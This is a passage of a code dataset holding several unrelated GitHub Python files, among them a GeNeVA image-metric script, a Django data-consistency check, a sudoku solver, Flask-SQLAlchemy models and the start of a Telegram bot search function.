__name__ catches test case name\n\n fileHandler = logging.FileHandler(\"logs.txt\") # describe file which is used for logs\n # format of logs\n format = logging.Formatter(\n \"%(asctime)s: %(levelname)s: %(name)s: %(message)s\") # example of tutor ;s is treating like a string\n\n fileHandler.setFormatter(format) # adding format to file object\n logger.addHandler(fileHandler) # to attach logs to file, requires usage of fileHandler object\n\n logger.setLevel(\n logging.INFO) # define the level of logs needed (selected is used, and below it f.e. 
warning = warning,error,critical\n return logger #method will return logger (logging object)","repo_name":"sashapush/python_QA","sub_path":"Pytest/BaseClass.py","file_name":"BaseClass.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41969074137","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport random\n\nimport click\nimport numpy as np\nfrom sklearn.metrics import jaccard_similarity_score, precision_score,\\\n recall_score, f1_score, pairwise\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torchvision.datasets.folder import default_loader, has_file_allowed_extension\nimport torchvision.transforms as transforms\nfrom tqdm import tqdm\n\nfrom geneva.models.object_localizer import Inception3ObjectLocalizer\n\n\nloaded_model = None\nIMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']\n\n\nclass ImageFolderNonGT(torch.utils.data.Dataset):\n \"\"\"\n Code from https://github.com/pytorch/vision/blob/f566fac80e3182a8b3c0219a88ae00ed1b81d7c7/torchvision/datasets/folder.py\n License:\n BSD 3-Clause License\n\n Copyright (c) Soumith Chintala 2016,\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n * Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n \"\"\"\n def __init__(self, root, transform=None, labelfile=None):\n self.root = root\n self.transform = transform\n\n generated_dirs = sorted([d.name for d in os.scandir(self.root) if d.is_dir() and not d.name.endswith('_gt')])\n gt_dirs = sorted([d.name for d in os.scandir(self.root) if d.is_dir() and d.name.endswith('_gt')])\n\n assert len(gt_dirs) == len(generated_dirs)\n\n gt_files = []\n generated_files = []\n for i in range(len(gt_dirs)):\n gt_files.extend([os.path.join(gt_dirs[i], x) for x in os.listdir(os.path.join(self.root, gt_dirs[i]))])\n generated_files.extend([os.path.join(generated_dirs[i], x)\n for x in os.listdir(os.path.join(self.root, generated_dirs[i]))])\n\n gt_imgs = [x for x in gt_files if has_file_allowed_extension(x, IMG_EXTENSIONS)]\n generated_imgs = [x for x in generated_files if has_file_allowed_extension(x, IMG_EXTENSIONS)]\n self.gt_filenames = gt_imgs\n self.generated_filenames = generated_imgs\n\n assert len(self.gt_filenames) == len(self.generated_filenames)\n\n if len(self.gt_filenames) == 0:\n raise(RuntimeError(\"Found 0 files in folder: \" + root + \"\\n\"\n \"Supported extensions are: \" + \",\".join(IMG_EXTENSIONS)))\n\n self.loader = default_loader\n\n def __getitem__(self, idx):\n gt_path = self.gt_filenames[idx]\n generated_path = self.generated_filenames[idx]\n gt_sample = self.loader(os.path.join(self.root, gt_path))\n generated_sample = self.loader(os.path.join(self.root, generated_path))\n if transforms is not None:\n generated_sample = self.transform(generated_sample)\n gt_sample = self.transform(gt_sample)\n\n return generated_sample, gt_sample\n\n def __len__(self):\n return len(self.gt_filenames)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\ndef setup_inception_model(num_classes, pretrained=False):\n if num_classes == 24:\n num_coords = 2\n else:\n num_coords = 3\n model = torch.nn.DataParallel(Inception3ObjectLocalizer(num_objects=num_classes,\n pretrained=pretrained,\n num_coords=num_coords)).cuda()\n return model\n\n\ndef construct_graph(coords, dataset):\n n = len(coords)\n graph = np.zeros((2, n, n))\n for i in range(n):\n if coords.shape[1] == 2:\n ref_x, ref_y = coords[i]\n else:\n ref_x, _, ref_y = coords[i]\n for j in range(n):\n if i == j:\n query_x, query_y = 0.5, 0.5\n else:\n if coords.shape[1] == 2:\n query_x, query_y = coords[j]\n else:\n query_x, _, query_y = coords[j]\n\n if ref_x > query_x:\n graph[0, i, j] = 1\n elif ref_x < query_x:\n graph[0, i, j] = -1\n\n if ref_y > query_y:\n graph[1, i, j] = 1\n elif ref_y < query_y:\n graph[1, i, j] = -1\n\n return graph\n\n\ndef get_graph_similarity(detections, label, locations, gt_locations, dataset):\n \"\"\"Computes the accuracy of relationships of 
the intersected\n detections multiplied by recall\n \"\"\"\n intersection = (detections & label).astype(bool)\n if not np.any(intersection):\n return 0\n\n locations = locations.data.cpu().numpy()[intersection]\n gt_locations = gt_locations.data.cpu().numpy()[intersection]\n\n genereated_graph = construct_graph(locations, dataset)\n gt_graph = construct_graph(gt_locations, dataset)\n\n matches = (genereated_graph == gt_graph).astype(int).flatten()\n matches_accuracy = matches.sum() / len(matches)\n recall = recall_score(label, detections, average='samples')\n\n graph_similarity = recall * matches_accuracy\n\n return graph_similarity\n\n\ndef get_obj_det_acc(dataloader, dataset):\n jss = []\n cs = []\n graph_similarity = []\n\n gt_all = []\n pred_all = []\n\n for _, (sample, gt) in enumerate(tqdm(dataloader)):\n sample = sample.cuda()\n gt = gt.cuda()\n detection_logits, locations = loaded_model(sample)\n gt_detection_logits, gt_locations = loaded_model(gt)\n\n pred = detection_logits > 0.5\n gt_pred = gt_detection_logits > 0.5\n\n pred = pred.cpu().numpy().astype('int')\n gt_pred = gt_pred.cpu().numpy().astype('int')\n gt_detection_logits = gt_detection_logits.cpu().numpy()\n detection_logits = detection_logits.cpu().numpy()\n\n gt_all.extend(gt_pred)\n pred_all.extend(pred)\n\n cs.append(pairwise.cosine_similarity(gt_detection_logits, detection_logits)[0][0])\n graph_similarity.append(get_graph_similarity(pred, gt_pred, locations, gt_locations, dataset))\n jss.append(jaccard_similarity_score(gt_pred, pred))\n\n ps = precision_score(np.array(gt_all), np.array(pred_all), average='samples')\n rs = recall_score(np.array(gt_all), np.array(pred_all), average='samples')\n f1 = f1_score(np.array(gt_all), np.array(pred_all), average='samples')\n\n return np.mean(jss), ps, rs, f1, np.mean(cs), np.mean(graph_similarity)\n\n\ndef _init_inception(model_dir):\n global loaded_model\n\n checkpoint = torch.load(model_dir)\n random.seed(1234)\n torch.manual_seed(1234)\n if checkpoint['cuda_enabled']:\n cudnn.deterministic = True\n loaded_model = setup_inception_model(checkpoint['num_classes'], pretrained=checkpoint['pretrained'])\n if checkpoint['cuda_enabled']:\n loaded_model = loaded_model.cuda()\n cudnn.benchmark = True\n loaded_model.load_state_dict(checkpoint['state_dict'])\n loaded_model.eval()\n\n\n@click.command()\n@click.option('--img-dir', type=click.Path(exists=True, dir_okay=True, readable=True), required=True)\n@click.option('--model-path', type=click.Path(exists=True, file_okay=True, readable=True), required=True)\n@click.option('--dataset-hdf5', type=click.Path(exists=True, file_okay=True, readable=True), required=True)\n@click.option('--dataset', type=str, required=False)\ndef calculate_inception_objects_accuracy(img_dir, model_path, dataset_hdf5, dataset):\n if loaded_model is None:\n _init_inception(model_path)\n test_transforms = transforms.Compose([transforms.Resize(299),\n transforms.ToTensor()])\n dataset = ImageFolderNonGT(img_dir, transform=test_transforms, labelfile=dataset_hdf5)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1)\n with torch.no_grad():\n jss, avg_precision, avg_recall, avg_f1, cs, graph_similarity = get_obj_det_acc(dataloader, dataset)\n print('\\nNumber of images used: {}\\nJSS: {}\\n AP: {}\\nAR: {}\\n F1: {}\\nCS: {}\\nGS: {}'.format(len(dataset), jss,\n avg_precision, avg_recall,\n avg_f1, cs,\n graph_similarity))\n return jss, avg_precision, avg_recall, avg_f1, cs, graph_similarity\n\n\nif __name__ == '__main__':\n 
calculate_inception_objects_accuracy()\n","repo_name":"Maluuba/GeNeVA","sub_path":"geneva/metrics/inception_localizer.py","file_name":"inception_localizer.py","file_ext":"py","file_size_in_byte":10343,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"35"} +{"seq_id":"23365149688","text":"import logging\nimport operator\nimport os\nimport sys\nfrom collections import Counter\n\nfrom django.db.models import Count\nfrom django.core.management.base import BaseCommand\nfrom opencivicdata.core.models import Jurisdiction, Membership, Organization, Person, Post, MembershipContactDetail\n\nfrom reports.utils import module_name_to_metadata\n\nlog = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Checks the consistency of documents per jurisdiction'\n\n def add_arguments(self, parser):\n parser.add_argument('module', nargs='?')\n\n def handle(self, *args, **options):\n sys.path.append(os.path.abspath('scrapers'))\n\n empty_organizations = {'Parliament of Canada', 'Senate'}\n\n if options['module']:\n division_id = module_name_to_metadata(options['module'])['division_id']\n jurisdictions = Jurisdiction.objects.filter(division_id=division_id)\n else:\n # Exclude candidate scrapers.\n jurisdictions = Jurisdiction.objects.exclude(classification='executive')\n\n organizations = Organization.objects.filter(jurisdiction__in=jurisdictions)\n posts = Post.objects.filter(organization__in=organizations)\n people = Person.objects.filter(memberships__organization__in=organizations)\n memberships = Membership.objects.filter(person_id__in=people)\n contact_details = MembershipContactDetail.objects.filter(membership__in=memberships)\n\n # A person has multiple memberships.\n jurisdiction_with_repetition = {\n 'ocd-jurisdiction/country:ca/cd:3521/legislature': 4, # Peel, due to Brampton\n 'ocd-jurisdiction/country:ca/csd:3521010/legislature': 4, # Brampton\n }\n\n post_memberships_count = posts.values('id').annotate(count=Count('memberships'))\n\n # Validate the number of organizations per jurisdiction.\n results = jurisdictions.values('id').annotate(count=Count('organizations')).exclude(count=1)\n # The Parliament of Canada has three organizations.\n if len(results) > 1 or results and results[0] != {'count': 3, 'id': 'ocd-jurisdiction/country:ca/legislature'}:\n log.error('{} jurisdictions do not have one organization'.format(len(results)))\n for result in results:\n log.info('{} {}'.format(result['count'], result['id']))\n\n # Validate the presence of posts and memberships on organizations.\n results = set(organizations.values('id').exclude(classification__in=('committee', 'party')).annotate(count=Count('posts')).filter(count=0).values_list('name', flat=True)) - empty_organizations\n self.report_value('non-committee, non-party organizations have no posts', results)\n results = set(organizations.values('id').exclude(classification='committee').annotate(count=Count('memberships')).filter(count=0).values_list('name', flat=True)) - empty_organizations\n self.report_value('non-committee organizations have no memberships', results)\n\n # Validate the number of memberships per post.\n results = Counter(post_memberships_count.filter(count=0).values_list('organization__name', flat=True))\n self.report_count('organizations have posts with no memberships (seats may be vacant)', results)\n results = Counter(post_memberships_count.filter(count__gt=1).values_list('organization__name', flat=True))\n self.report_count('organizations have posts with many 
memberships', results)\n\n # Validate the presence of posts on memberships.\n results = Counter(memberships.filter(post_id=None).exclude(organization__classification='party').values_list('organization__name', flat=True))\n self.report_count('non-party organizations have memberships with no posts', results)\n\n # Validate that people have at most one post-membership.\n results = people.values('id').exclude(memberships__organization__classification='party').exclude(memberships__organization__jurisdiction_id__in=jurisdiction_with_repetition.keys()).annotate(count=Count('memberships')).exclude(count=1).values_list('name', flat=True)\n self.report_value('people have many non-party memberships', results)\n for jurisdiction_id, threshold in jurisdiction_with_repetition.items():\n results = people.values('id').exclude(memberships__organization__classification='party').filter(memberships__organization__jurisdiction_id=jurisdiction_id).annotate(count=Count('memberships')).exclude(count__lte=threshold).values_list('name', flat=True)\n self.report_value('people have many non-party memberships in {}'.format(jurisdiction_id), results)\n\n # Validate that people have at most one party-membership.\n results = people.values('id').filter(memberships__organization__classification='party').annotate(count=Count('memberships')).exclude(count=1).values_list('name', flat=True)\n self.report_value('people have many party memberships', results)\n\n # Validate the uniqueness of names and images.\n people_without_repetition = people.exclude(memberships__organization__jurisdiction_id__in=jurisdiction_with_repetition.keys())\n results = self.repeated(people_without_repetition.values_list('name', flat=True))\n self.report_count('names are repeated across people', results)\n results = self.repeated(people_without_repetition.exclude(image='').values_list('image', flat=True))\n self.report_count('images are repeated across people', results)\n for jurisdiction_id, threshold in jurisdiction_with_repetition.items():\n people_with_repetition = people.filter(memberships__organization__jurisdiction_id=jurisdiction_id)\n results = self.repeated(people_with_repetition.values_list('name', flat=True), threshold=threshold)\n self.report_count('names are repeated across people in {}'.format(jurisdiction_id), results)\n results = self.repeated(people_with_repetition.exclude(image='').values_list('image', flat=True), threshold=threshold)\n self.report_count('images are repeated across people in {}'.format(jurisdiction_id), results)\n\n # Validate the uniqueness of link URLs.\n results = self.repeated(people.exclude(links__url=None).values_list('links__url', flat=True))\n self.report_count('link URLs are repeated across people', results)\n\n # Validate the uniqueness of email contact detail values.\n results = self.repeated(contact_details.filter(type='email').exclude(membership__organization__jurisdiction_id__in=jurisdiction_with_repetition.keys()).values_list('value', flat=True))\n self.report_count('emails are repeated across membership contact details', results)\n for jurisdiction_id, threshold in jurisdiction_with_repetition.items():\n results = self.repeated(contact_details.filter(type='email').filter(membership__organization__jurisdiction_id=jurisdiction_id).values_list('value', flat=True), threshold=threshold)\n self.report_count('emails are repeated across membership contact details in {}'.format(jurisdiction_id), results)\n\n # Validate presence of email contact detail.\n jurisdiction_with_no_email = [\n # Javascript-encoded 
email\n 'ocd-jurisdiction/country:ca/csd:1217030/legislature', # Cape Breton\n # Webform email\n 'ocd-jurisdiction/country:ca/csd:2423027/legislature', # Québec\n 'ocd-jurisdiction/country:ca/csd:2464008/legislature', # Terrebonne\n 'ocd-jurisdiction/country:ca/csd:3524009/legislature', # Milton\n 'ocd-jurisdiction/country:ca/csd:3530016/legislature', # Waterloo\n 'ocd-jurisdiction/country:ca/csd:3530027/legislature', # Wellesley\n 'ocd-jurisdiction/country:ca/csd:3530035/legislature', # Woolwich\n 'ocd-jurisdiction/country:ca/csd:4706027/legislature', # Regina\n 'ocd-jurisdiction/country:ca/csd:4711066/legislature', # Saskatoon\n 'ocd-jurisdiction/country:ca/csd:4806016/legislature', # Calgary\n 'ocd-jurisdiction/country:ca/csd:5909052/legislature', # Abbotsford\n ]\n leaders_with_no_email = {\n 'ocd-jurisdiction/country:ca/cd:3521/legislature', # Peel\n 'ocd-jurisdiction/country:ca/csd:2437067/legislature', # Trois-Rivières\n 'ocd-jurisdiction/country:ca/csd:2456083/legislature', # Saint-Jean-sur-Richelieu\n 'ocd-jurisdiction/country:ca/csd:2494068/legislature', # Saguenay\n 'ocd-jurisdiction/country:ca/csd:3520005/legislature', # Toronto\n 'ocd-jurisdiction/country:ca/csd:3521024/legislature', # Caledon\n 'ocd-jurisdiction/country:ca/csd:3530013/legislature', # Kitchener\n 'ocd-jurisdiction/country:ca/csd:4811061/legislature', # Edmonton\n 'ocd-jurisdiction/country:ca/csd:4816037/legislature', # Wood Buffalo\n 'ocd-jurisdiction/country:ca/csd:5909052/legislature', # Abbotsford\n 'ocd-jurisdiction/country:ca/csd:5915004/legislature', # Surrey\n }\n jurisdiction_ids = jurisdictions.exclude(id__in=jurisdiction_with_no_email).values_list('id', flat=True)\n for jurisdiction_id in jurisdiction_ids:\n for organization in organizations.filter(jurisdiction_id=jurisdiction_id):\n # It's ridiculous that Django can't do a LEFT OUTER JOIN with a WHERE clause.\n memberships_with_no_email = sum(not membership.contact_details.filter(type='email').count() for membership in organization.memberships.all())\n if memberships_with_no_email > 1 or memberships_with_no_email and jurisdiction_id not in leaders_with_no_email:\n log.error('{:2} memberships have no email in {}'.format(memberships_with_no_email, organization.name))\n\n def repeated(self, results, *, threshold=1):\n return {value: count for value, count in Counter(results).items() if count > threshold}\n\n def report_value(self, message, results):\n if results:\n log.error('{} {}:'.format(len(results), message))\n for value in results:\n log.info(value)\n log.info('---')\n\n def report_count(self, message, results):\n if results:\n log.error('{} {}:'.format(len(results), message))\n for value, count in sorted(results.items(), key=operator.itemgetter(1), reverse=True):\n log.info('{:2} {}'.format(count, value))\n log.info('---')\n","repo_name":"opennorth/scrapers_ca_app","sub_path":"reports/management/commands/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":10537,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"19067538440","text":"# at end of row, row +=1 col = 0, else col += 1\n# for loop, if you can put c, put c\n# then call recursive function again until returns true\n# if it doens't return true, put '.'\n# canput function see if entire row or col has char\n# see if if it's in rowGroup+3 and colGroup+3\n\nclass Solution:\n\t# @param A : list of list of chars\n\t# @return nothing\n\tdef solveSudoku(self, board):\n\t\tself.solveSudokuRec(board, 0, 0)\n\tdef 
solveSudokuRec(self, board, row, col):\n\t\tif row == 9:\n\t\t\treturn True\n\t\tif col == 8:\n\t\t\tnextRow = row+1\n\t\t\tnextCol = 0\n\t\telse:\n\t\t\tnextRow = row\n\t\t\tnextCol = col+1\n\t\tif board[row][col] != '.':\n\t\t\treturn self.solveSudokuRec(board, nextRow, nextCol)\n\t\tfor c in xrange(1, 10):\n\t\t\tif self.canPut(board, str(c), row, col):\n\t\t\t\tboard[row][col] = str(c)\n\t\t\t\tif self.solveSudokuRec(board, nextRow, nextCol):\n\t\t\t\t\treturn True\n\t\t\t\tboard[row][col] = '.'\n\t\treturn False\n\tdef canPut(self, board, char, row, col):\n\t\tfor i in xrange(0, 9):\n\t\t\tif board[row][i] == char or board[i][col] == char:\n\t\t\t\treturn False\n\t\t# box check belongs after the row/column loop, not inside it\n\t\trowGroup = (row//3) * 3\t\t# floor division 8 is in group 6-9\n\t\tcolGroup = (col//3) * 3\t\t# group 0, 3, 6\n\t\tfor i in xrange(rowGroup, rowGroup + 3):\n\t\t\tfor j in xrange(colGroup, colGroup+3):\n\t\t\t\tif board[i][j] == char:\n\t\t\t\t\treturn False\n\t\treturn True\n\"\"\"\nWrite a program to solve a Sudoku puzzle by filling the empty cells.\nEmpty cells are indicated by the character '.' \nYou may assume that there will be only one unique solution.\n\n\n\nA sudoku puzzle,\n\n\n\nand its solution numbers marked in red.\n\nExample :\n\nFor the above given diagrams, the corresponding input to your program will be\n\n[[53..7....], [6..195...], [.98....6.], [8...6...3], [4..8.3..1], [7...2...6], [.6....28.], [...419..5], [....8..79]]\nand we would expect your program to modify the above array of array of characters to\n\n[[534678912], [672195348], [198342567], [859761423], [426853791], [713924856], [961537284], [287419635], [345286179]]\n\"\"\"","repo_name":"sample-apps/interviewBit","sub_path":"Java & Python/backtracking/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26569873208","text":"def notas(*args, sit=False):\r\n dicionario = dict()\r\n listnotas = [n for n in args if isinstance(n, (int, float))]\r\n total = len(listnotas)\r\n soma = sum(listnotas)\r\n media = soma / total if total > 0 else 0\r\n dicionario['total'] = total\r\n dicionario['maior'] = max(listnotas) if total > 0 else 0\r\n dicionario['menor'] = min(listnotas) if total > 0 else 0\r\n dicionario['media'] = media\r\n if sit:\r\n if media < 5:\r\n dicionario['situação'] = 'RUIM'\r\n elif 5 <= media <= 7:\r\n dicionario['situação'] = 'RAZOÁVEL'\r\n else:\r\n dicionario['situação'] = 'BOM'\r\n return dicionario\r\n\r\n\r\n# Main program\r\nresp = notas(5.5, 2.5, 1.5, sit=True)\r\nprint(resp)\r\n","repo_name":"matteusmoreno/ProjetosIniciaisPython","sub_path":"Exercícios Python 100 - 106/EX105.py","file_name":"EX105.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38965468525","text":"from application import db\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n email = db.Column(db.String(64))\n user_type = db.Column(db.String(32))\n given_name = db.Column(db.String(32))\n family_name = db.Column(db.String(32))\n phone = db.Column(db.String(15))\n company = db.Column(db.String(15))\n address = db.Column(db.String(256))\n city = db.Column(db.String(32))\n state = db.Column(db.String(2))\n zipcode = db.Column(db.String(5))\n linkedin = db.Column(db.String(256))\n website = db.Column(db.String(256))\n\n def
__init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.email = kwargs.get('email', \"\")\n self.user_type = kwargs.get('user_type', \"\")\n self.given_name = kwargs.get('given_name', \"\")\n self.family_name = kwargs.get('family_name', \"\")\n self.phone = kwargs.get('phone', \"\")\n self.company = kwargs.get('company', \"\")\n self.address = kwargs.get('address', \"\")\n self.city = kwargs.get('city', \"\")\n self.state = kwargs.get('state', \"\")\n self.zipcode = kwargs.get('zipcode', \"\")\n self.linkedin = kwargs.get('linkedin', \"\")\n self.website = kwargs.get('website', \"\")\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(User).filter(User.uid == self.uid)\\\n .update({User.uid: self.uid,\n User.email: self.email,\n User.user_type: self.user_type,\n User.given_name: self.given_name,\n User.family_name: self.family_name,\n User.phone: self.phone,\n User.company: self.company,\n User.address: self.address,\n User.city: self.city,\n User.state: self.state,\n User.zipcode: self.zipcode,\n User.linkedin: self.linkedin,\n User.website: self.website})\n db.session.commit()\n\n def exist(self):\n for row in db.session.query(User).filter(User.uid == self.uid):\n return True\n return False\n\n def profile(self):\n return db.session.query(User).filter(User.uid == self.uid).first()\n\n def tojson(self):\n return {'email': self.email,\n 'user_type': self.user_type,\n 'given_name': self.given_name,\n 'family_name': self.family_name,\n 'phone': self.phone,\n 'company': self.company,\n 'address': self.address,\n 'city': self.city,\n 'state': self.state,\n 'zipcode': self.zipcode,\n 'linkedin': self.linkedin,\n 'website': self.website}\n\n\nclass Skill(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n skill_list = db.Column(db.String(1024))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.skill_list = kwargs.get('skill_list', \"\")\n\n def exist(self):\n for row in db.session.query(Skill).filter(Skill.uid == self.uid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(Skill).filter(Skill.uid == self.uid)\\\n .update({Skill.skill_list: self.skill_list})\n db.session.commit()\n\n def skills(self):\n return db.session.query(Skill).filter(Skill.uid == self.uid).first()\n\n def tojson(self):\n return {'skill_list': self.skill_list}\n\n\nclass Role(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n role_list = db.Column(db.String(512))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.role_list = kwargs.get('role_list', \"\")\n\n def exist(self):\n for row in db.session.query(Role).filter(Role.uid == self.uid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(Role).filter(Role.uid == self.uid)\\\n .update({Role.role_list: self.role_list})\n db.session.commit()\n\n def roles(self):\n return db.session.query(Role).filter(Role.uid == self.uid).first()\n\n def tojson(self):\n return {'role_list': self.role_list}\n\n\nclass Work(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n work_list = db.Column(db.String(2048))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.work_list = 
kwargs.get('work_list', \"\")\n\n def exist(self):\n for row in db.session.query(Work).filter(Work.uid == self.uid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.query(Work).filter(Work.uid == self.uid)\\\n .update({Work.work_list: self.work_list})\n db.session.commit()\n\n def works(self):\n return db.session.query(Work).filter(Work.uid == self.uid).first()\n\n def tojson(self):\n return {'work_list': self.work_list}\n\n\nclass Project(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n pid = db.Column(db.String(256)) # md5(project_name)\n name = db.Column(db.String(256))\n uid = db.Column(db.String(256)) # Poster uid\n status = db.Column(db.String(256))\n description = db.Column(db.String(1024))\n budget = db.Column(db.Integer)\n creator = db.Column(db.String(256))\n folder = db.Column(db.String(128))\n create_time = db.Column(db.DateTime, default=db.func.now())\n\n def __init__(self, **kwargs):\n self.id = kwargs.get('id', \"\")\n self.pid = kwargs.get('pid', \"\")\n self.name = kwargs.get('name', \"\")\n self.uid = kwargs.get('uid', \"\") # Poster uid\n self.status = kwargs.get('status', \"\")\n self.description = kwargs.get('description', \"\")\n self.budget = kwargs.get('budget', \"\")\n self.creator = kwargs.get('creator', \"\")\n self.folder = kwargs.get('folder', \"\")\n\n def exist(self):\n for row in db.session.query(Project).filter(Project.uid == self.uid)\\\n .filter(Project.pid == self.pid):\n return True\n return False\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n def list(self):\n project_list = []\n for row in db.session.query(Project).filter(Project.uid == self.uid):\n project_list.append({'name': row.name,\n 'status': row.status,\n 'create_time': row.create_time,\n 'budget': row.budget})\n return project_list\n\n\nclass PRZ(db.Model):\n \"\"\"PRZ(Project Running Zone)\"\"\"\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128)) # Poster uid\n pid = db.Column(db.String(128)) # md5(project_name)\n creator = db.Column(db.String(256))\n status = db.Column(db.String(256))\n offer_price = db.Column(db.Integer)\n accept_price = db.Column(db.Integer)\n final_price = db.Column(db.Integer)\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.pid = kwargs.get('pid', \"\")\n self.creator = kwargs.get('creator', \"\")\n self.status = kwargs.get('status', \"\")\n self.offer_price = kwargs.get('offer_price', \"\")\n self.accept_price = kwargs.get('accept_price', \"\")\n self.final_price = kwargs.get('final_price', \"\")\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n\nclass PH(db.Model):\n \"\"\"Project History\"\"\"\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n uid = db.Column(db.String(128))\n pid = db.Column(db.String(128))\n log_tpye = db.Column(db.String(1024))\n log = db.Column(db.String(1024))\n\n def __init__(self, **kwargs):\n self.uid = kwargs.get('uid', \"\")\n self.pid = kwargs.get('pid', \"\")\n self.log_type = kwargs.get('log_type', \"\")\n self.log = kwargs.get('log', \"\")\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"pangjie/fmx_creator_sample","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9699048628","text":"x 
= (x**2 for x in range(4))\n\nfor item in x:\n print('1:', item)\n\n# x = (x**2 for x in range(4))\n# print('2:', next(x))\n\n# for item in x:\n# print('3:', item)\n\n\n","repo_name":"helga20/LNU_ProgrammingPython","sub_path":"Lectures/08/_08_iterators/_02_iter_for.py","file_name":"_02_iter_for.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25087720865","text":"from api.imports import *\nfrom api.variables import *\nfrom api.bot_error import *\n\nasync def search(\n update: Update,\n context: ContextTypes.DEFAULT_TYPE\n) -> list[tuple]:\n \"\"\"Search the user's message.\"\"\" \n\n global filename, msg_id, link_list, page_number, page_size, start_index, end_index, enum_link_list\n\n page_size = 10\n\n # Set the current page number\n page_number = 1\n \n # Calculate the start and end indices for the current page\n start_index = (page_number - 1) * page_size\n end_index = start_index + page_size\n\n link_list, msg_id, filename, title, performer = [], [], [], [], []\n\n try:\n for k, v in data.items():\n if (re.search(\n update.message.text,\n v.get('filename'),\n re.IGNORECASE)\n ):\n msg_id.append(k)\n filename.append(v.get('filename'))\n title.append(v.get('title'))\n performer.append(v.get('performer'))\n \n except AttributeError as e:\n e\n \n keyboard = [\n [\n InlineKeyboardButton(\n \"<\",\n callback_data=\"1\"\n ),\n \n InlineKeyboardButton(\n \">\",\n callback_data=\"2\"\n ),\n ]\n ]\n \n reply_markup = InlineKeyboardMarkup(keyboard)\n\n COUNT = 0\n link = re.search(r\"(t\\.me\\/[a-zA-Z0-9_]{5,32})\", update.message.text)\n\n for i in range(len(filename)):\n link_str = \"[{}]({})\\n\".format(\n filename[i],\n dcr8_url+\"{}\".format(msg_id[i])\n )\n link_list.append(link_str)\n\n enum_link_list = [\n \"{}. {}\".format(i, link_str) for i,\n link_str in enumerate(link_list, start=1)\n ]\n # Slice the list to get the items 